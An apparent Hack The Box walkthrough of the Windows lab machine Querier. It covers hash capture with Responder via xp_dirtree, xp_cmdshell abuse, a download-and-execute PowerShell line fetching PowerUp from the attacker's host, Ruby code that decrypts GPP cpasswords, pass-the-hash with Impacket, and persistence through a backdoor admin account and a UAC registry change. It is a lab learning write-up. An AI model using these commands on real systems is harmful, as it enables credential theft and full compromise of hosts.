Querier

HTB Windows

nmap -p- --open -T5 -v -n 10.129.1.147

nmap -p- --open -T5 -v -n 10.129.1.147 --max-retries 0 -oG allPorts


extractPorts allPorts


nmap -sCV -pX 10.129.1.147 -oN targeted --version-intensity 0


crackmapexec smb 10.129.1.147


smbclient -L 10.129.1.147 -N

We see that we can access the Reports share without credentials (the -N null session).


We see that port 1433 is open, running ms-sql-s (Microsoft SQL Server).

locate mssqlclient.py


smbclient "//10.129.1.147/Reports/" -N

get "Currency Volume Report.xlsm"

exit


olevba "Currency Volume Report.xlsm"


crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6'

crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6' -d WORKGROUP


We see the NTLM hash (the Net-NTLMv2 challenge-response captured by Responder).


python2 /opt/Responder/Responder.py -I tun0 -rdw


xp_dirtree '\\10.10.14.108\si'

The share does not need to exist: the SQL Server service account tries to authenticate to our Responder listener over SMB and leaks its Net-NTLMv2 response in the process.


john --wordlist=/usr/share/wordlists/rockyou.txt querier_hash.txt
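Responder already prints the captured response in the format john and hashcat accept. The Ruby snippet below is an added example, not part of this writeup or of Responder; it parses such a line, tells NetNTLMv1 from NetNTLMv2 by field lengths, and reports the cracking mode. The sample line is constructed with made-up hex values, not a real capture. The point to keep in mind: a Net-NTLM response is a challenge-response transcript, so it has to be cracked to a password; unlike the NT hash dumped later with --sam, it cannot be replayed with pass-the-hash.

```ruby
# Added example (not from the original writeup or from Responder): parse a captured
# Net-NTLM line and decide how to crack it.
NetNtlm = Struct.new(:user, :domain, :version, :challenge, :john_format, :hashcat_mode)

HEX = /\A\h+\z/

# Responder writes NetNTLMv2 as  USER::DOMAIN:<server challenge>:<NTProofStr>:<blob>
# and NetNTLMv1 as              USER::DOMAIN:<LM resp>:<NT resp>:<server challenge>
def parse_netntlm(line)
  f = line.strip.split(':', -1)
  raise ArgumentError, "expected 6 colon-separated fields, got #{f.length}" unless f.length == 6
  user, empty, domain, a, b, c = f
  raise ArgumentError, 'second field must be empty' unless empty.empty?
  raise ArgumentError, 'non-hex data in hash fields' unless [a, b, c].all? { |x| x.match?(HEX) }

  if a.length == 16 && b.length == 32
    # v2: 8-byte server challenge, 16-byte NTProofStr (HMAC-MD5), then the client blob
    NetNtlm.new(user, domain, 2, a, 'netntlmv2', 5600)
  elsif a.length == 48 && b.length == 48 && c.length == 16
    # v1: 24-byte LM and NT responses, 8-byte server challenge last
    NetNtlm.new(user, domain, 1, c, 'netntlm', 5500)
  else
    raise ArgumentError, 'field lengths match neither NetNTLMv1 nor NetNTLMv2'
  end
end

# Build the john invocation for a parsed line (same wordlist the writeup uses).
def john_command(parsed, hashfile, wordlist = '/usr/share/wordlists/rockyou.txt')
  "john --format=#{parsed.john_format} --wordlist=#{wordlist} #{hashfile}"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample line (random hex, not a real capture)
  sample = 'mssql-svc::QUERIER:1122334455667788:' \
           '00112233445566778899aabbccddeeff:0101000000000000aabbccddeeff0011'
  p = parse_netntlm(sample)
  puts "#{p.user}@#{p.domain}: NetNTLMv#{p.version}, hashcat -m #{p.hashcat_mode}"
  puts john_command(p, 'querier_hash.txt')
end
```

john usually autodetects netntlmv2, but passing --format explicitly avoids it picking a different format when the hash file mixes captures from several hosts.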


crackmapexec smb 10.129.1.147 -u 'mssql-svc' -p 'corporate568' -d WORKGROUP


sp_configure 'show advanced options', 1

reconfigure

sp_configure 'xp_cmdshell', 1

reconfigure

xp_cmdshell 'whoami'


xp_cmdshell 'ipconfig'


cp /home/kali/Desktop/boxes/Invoke-PowerShellTcp.ps1 .

python3 -m http.server 8888


It seems a service resets the settings above to their defaults.


ipconfig

It could be a Potato-style privilege escalation, so we check the token privileges.


whoami /priv


We append Invoke-AllChecks to the end of PowerUp.ps1 so it runs as soon as the script is loaded.

We start a Python web server:

python3 -m http.server 8888


IEX(New-Object Net.WebClient).downloadString('http://10.10.14.108:8888/PowerUp.ps1')


We can see the UsoSvc service. The steps are in this wiki:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Example with Windows 10 - CVE-2019-1322 UsoSvc


We see the credentials found in Groups.xml.


The value assigned to cpassword is visible. It is not a hash: it is the password AES-encrypted with a fixed key Microsoft published, so it decrypts directly.


gpp-decrypt "<cpassword value>"

It decrypts to the same password PowerUp showed: MyUnclesAreMarioAndLuigi!!1!
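gpp-decrypt is itself a short Ruby script wrapping OpenSSL. The following equivalent is an added example, not the writeup's code and not Kali's gpp-decrypt; it shows exactly why the cpassword value is recoverable: AES-256-CBC with the fixed key Microsoft published in its MS-GPPREF documentation, an all-zero IV, UTF-16LE plaintext, and base64 with the '=' padding stripped. The Groups.xml fragment is constructed here with the encrypt helper, since the writeup does not reproduce the box's actual cpassword.

```ruby
# Added example (not from the original writeup and not Kali's gpp-decrypt): decrypt a
# Group Policy Preferences cpassword with Ruby's stdlib OpenSSL.
require 'openssl'

# The 32-byte AES key Microsoft published in MS-GPPREF (the reason MS14-025 exists).
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')
GPP_IV = ("\x00" * 16).b   # the GPP editor uses an all-zero IV

def gpp_cipher(mode)
  c = OpenSSL::Cipher.new('aes-256-cbc')
  mode == :encrypt ? c.encrypt : c.decrypt
  c.key = GPP_AES_KEY
  c.iv = GPP_IV
  c
end

# cpassword -> plaintext. The stored value is base64 with '=' padding stripped,
# and the plaintext is UTF-16LE (a Windows wide string).
def gpp_decrypt(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = padded.unpack1('m')
  c = gpp_cipher(:decrypt)
  (c.update(ciphertext) + c.final).force_encoding('UTF-16LE').encode('UTF-8')
end

# plaintext -> cpassword, i.e. what the GPP editor wrote into Groups.xml; used here
# to build a test fixture because the writeup does not reproduce the box's value.
def gpp_encrypt(password)
  c = gpp_cipher(:encrypt)
  data = password.encode('UTF-16LE').b
  [c.update(data) + c.final].pack('m0').delete('=')
end

# Pull every cpassword attribute out of a Groups.xml body (regex, no XML gem needed).
def cpasswords_from_xml(xml)
  xml.scan(/cpassword="([^"]*)"/).flatten
end

if __FILE__ == $PROGRAM_NAME
  # Constructed Groups.xml fragment; the cpassword is generated above, not copied from the box.
  xml = %(<User name="Administrator"><Properties userName="Administrator" ) +
        %(cpassword="#{gpp_encrypt('MyUnclesAreMarioAndLuigi!!1!')}"/></User>)
  cpasswords_from_xml(xml).each { |cp| puts "#{cp} -> #{gpp_decrypt(cp)}" }
end
```

Any account that can read SYSVOL, or a cached copy under C:\ProgramData\Microsoft\Group Policy\History as PowerUp finds here, can run this; that is why Microsoft removed the ability to set passwords in GPP rather than trying to rotate the key.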


crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1!'

crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1!' -d WORKGROUP --sam


python3 /opt/impacket/examples/smbexec.py WORKGROUP/Administrator@10.129.1.147 -hashes :2dcefe78334b42c0ce483b8e1b2886ab


net user cu3rv0x pass123 /add


net localgroup "Administrators" cu3rv0x /add


net share attacker_folder=C:\Windows\Temp /GRANT:Administrators,FULL


reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Setting LocalAccountTokenFilterPolicy to 1 turns off UAC remote restrictions, so a local administrator account other than the built-in Administrator gets a full, unfiltered token over the network. Without it the new cu3rv0x account would authenticate but not be able to run commands remotely.


crackmapexec smb 10.129.1.147 -u 'cu3rv0x' -p 'pass123'


python3 /opt/impacket/examples/wmiexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe -hashes :2dcefe78334b42c0ce483b8e1b2886ab


python3 /opt/impacket/examples/psexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe


© 2025 Cu3rv0x